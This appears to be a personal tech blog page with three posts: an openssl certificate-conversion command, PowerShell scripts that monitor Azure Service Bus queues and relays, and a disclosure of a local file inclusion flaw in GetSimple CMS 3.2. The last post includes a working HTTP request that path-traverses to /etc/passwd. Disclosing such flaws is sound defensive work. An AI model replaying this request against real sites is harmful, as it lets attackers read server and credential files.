Convert apache style certificates – crt and key files to IIS compatable pfx certificates with private key using openssl

This has always been a bit of an irritating command for me – I find it then forget it and it takes ages to remember the right syntax to do it the next time I need it.

So here it is using openssl

 

openssl pkcs12 -export -in mycert.crt -inkey mycert.key -out mycert.pfx -certfile ca.crt

 

Bosh

Windows Azure servicebus queue and relay REST calls for monitoring

Whilst deploying a new application to Windows Azure Cloud services, one of the components that was being used was both Servicebus relays and queues.

Traditional cloud or web services are relatively easy to monitor, usually a web or api type call, but as Servicebus doesn’t have a directly callable endpoint as such monitoring is a little more tricky.

Because its new, currently there isn’t much help on the web with regard to the REST api for servicebus, especially if its secured using ACS, so I have knocked together some scripts using powershell which call to ACS for your authorization token, then present that in a http REST call which will get in the case of a servicebus queue, the details of that queue – if there are messages in there, and in the case of relays, the name and whether there are any listeners connected.

PowerShell scripts below for Relays – it probably needs some tidying up but it does the main bits..

function Execute-HTTPPostCommand() {
param(
[string] $target = $null, [string] $Post
)

$url = $target

$parameters = $Post # your POST parameters

$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open(‘POST’, $url, $false)
$http_request.setRequestHeader(“Content-type”,”application/x-www-form-urlencoded”)
$http_request.setRequestHeader(“Content-length”, $parameters.length)
$http_request.setRequestHeader(“Connection”, “close”)
$http_request.send($parameters)
$http_request.statusText

$results = $http_request.ResponseText
return $results;

}

function Execute-HTTPGetCommand() {
param(
[string] $target = $null, [string] $authstring
)

$authnew = $authstring.Split(“=”,2)

#Write-Host “authnew”,$authnew[1]
$authnospace = $authnew[1]
$strippedauth = $authnospace -replace ‘ ‘, ”

$encmsg = [System.Web.HttpUtility]::UrlDecode($strippedauth)
$encmsg1 = [System.Web.HttpUtility]::UrlDecode($encmsg)

write-host $encmsg
$encmsg2 = $encmsg -replace ‘&wrap_access_token_expires_in=10799′, ”
$encmsg2 = $encmsg -replace ‘&wrap_access_token_expires_in=10800′, ”

write-host $encmsg2

$authfull = “WRAP access_token=`”" + $encmsg2 + “`”"
$url = $target

$parameters = $Post # your POST parameters

$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open(‘GET’, $url, $false)

$http_request.setRequestHeader(“Authorization”, $authfull)
$http_request.setRequestHeader(“Connection”, “close”)
$http_request.send($parameters)
$http_request.statusText

$results = $http_request.ResponseText
return $results;

}

$post = “wrap_name=owner&wrap_password=[URIEncodedpassword]&wrap_scope=http%3A%2F%2F[namespace].servicebus.windows.net”
$URL = “https://[namespace]-sb.accesscontrol.windows.net/WRAPv0.9/”

$authstring = Execute-HTTPPostCommand $URL $post

$URL2 = “https://[namespace].servicebus.windows.net/`$Resources/Relays”

Execute-HTTPGetCommand $URL2 $authstring

 

———————- Powershell Script for querying Servicebus queues this returns if the queue is greater than 0

function Execute-HTTPPostCommand() {
param(
[string] $target = $null, [string] $Post
)

$url = $target

$parameters = $Post # your POST parameters

$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open(‘POST’, $url, $false)
$http_request.setRequestHeader(“Content-type”,”application/x-www-form-urlencoded”)
$http_request.setRequestHeader(“Content-length”, $parameters.length)
$http_request.setRequestHeader(“Connection”, “close”)
$http_request.send($parameters)
$http_request.statusText

$results = $http_request.ResponseText
return $results;

}

function Execute-HTTPGetCommand() {
param(
[string] $target = $null, [string] $authstring
)

$authnew = $authstring.Split(“=”,2)

#Write-Host “authnew”,$authnew[1]
$authnospace = $authnew[1]
$strippedauth = $authnospace -replace ‘ ‘, ”

$encmsg = [System.Web.HttpUtility]::UrlDecode($strippedauth)
$encmsg1 = [System.Web.HttpUtility]::UrlDecode($encmsg)

write-host $encmsg
$encmsg2 = $encmsg -replace ‘&wrap_access_token_expires_in=10799′, ”
$encmsg2 = $encmsg -replace ‘&wrap_access_token_expires_in=10800′, ”

write-host $encmsg2

$authfull = “WRAP access_token=`”" + $encmsg2 + “`”"
$url = $target

$parameters = $Post # your POST parameters

$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open(‘GET’, $url, $false)

$http_request.setRequestHeader(“Authorization”, $authfull)
$http_request.setRequestHeader(“Connection”, “close”)
$http_request.send($parameters)
$http_request.statusText

$results = $http_request.ResponseText
return $results;

}

$post = “wrap_name=owner&wrap_password=[URIEncodedpassword]&wrap_scope=http%3A%2F%2F[namespace].servicebus.windows.net”
$URL = “https://[namespace]-sb.accesscontrol.windows.net/WRAPv0.9/”

$authstring = Execute-HTTPPostCommand $URL $post

$URL2 = “https://[namespace].servicebus.windows.net/`$Resources/Queues?`$filter=MessageCount%20Gt%200″

Execute-HTTPGetCommand $URL2 $authstring

 

GetSimple CMS 3.2 LFI exploit

Following on my series of GetSimple CMS articles this one details a LFI (Local file inclusion) vulnerability which is present in current and current beta versions – 3.2beta.

As per the previous article this requires you to be logged in as a valid user.

The code at fault is in the settings.php page and is the language parameter, I have listed the section below:

if(isset($_POST['lang'])) {
$LANG = $_POST['lang'];

Then its used here
include(GSLANGPATH.$LANG.’.php’);

So for example if you post the following request, you will get the /etc/passwd file which given these days they contain no passwords is probably the least of your worries, more likely an attacker would be after other files with credentials in.

POST /admin/settings.php HTTP/1.1
Host: getsimplecmshost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://getsimplecmshost/admin/settings.php
Cookie: validcookie
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 315

nonce=validnonce&sitename=GetSimpleCMSSite&siteurl=http%3A%2F%2Fgetsimplehost%2F&permalink=&user=admin&email=admin@domainname&timezone=Europe%2FLondon&lang=../../../../../../../../etc/passwd%00&show_htmleditor=1&sitepwd=&sitepwd_confirm=&submitted=Save+Settings

As I’ve mentioned in previous articles whilst this requires a valid user, its not acceptable that even an authenticated user can read files off the local file system – especially in the case of hosted systems.

In extreme circumstances this LFI can also lead to complete server compromise using a technique where php code is injected into files which are readable by the web process and subsequently included in the above request and executed.

Again simple user input validation would completely reduce this attack.